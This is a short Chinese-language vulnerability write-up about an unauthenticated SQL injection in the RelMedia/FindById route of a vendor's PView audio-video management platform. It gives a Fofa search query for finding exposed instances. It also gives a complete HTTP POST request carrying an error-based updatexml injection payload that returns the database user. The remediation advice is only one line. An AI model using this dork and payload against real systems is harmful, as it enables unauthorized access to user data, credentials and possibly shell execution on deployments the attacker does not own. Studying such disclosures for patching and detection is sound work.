0x01 漏洞描述:
誉龙公司定位为系统级的移动视音频记录解决方案提供商,凭借其深厚的行业经验,坚持自主研发,匠心打造记录仪领域行业生态,提供开放式的记录仪APK、GB28181 SDK、国网B协议、管理平台软件OEM。其在RelMedia/FindById路由中存在sql注入,未经身份验证的攻击者可通过漏洞写入可执行的sql语句用以窃取用户数据、账号密码等,高权限角色甚至可执行shell。
0x02 搜索语句:
Fofa:body="PView 视音频管理平台"
0x03 漏洞复现:
POST /index.php?r=RelMedia/FindById HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
id=1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+
0x04 修复建议:
厂商已发布补丁请及时修复。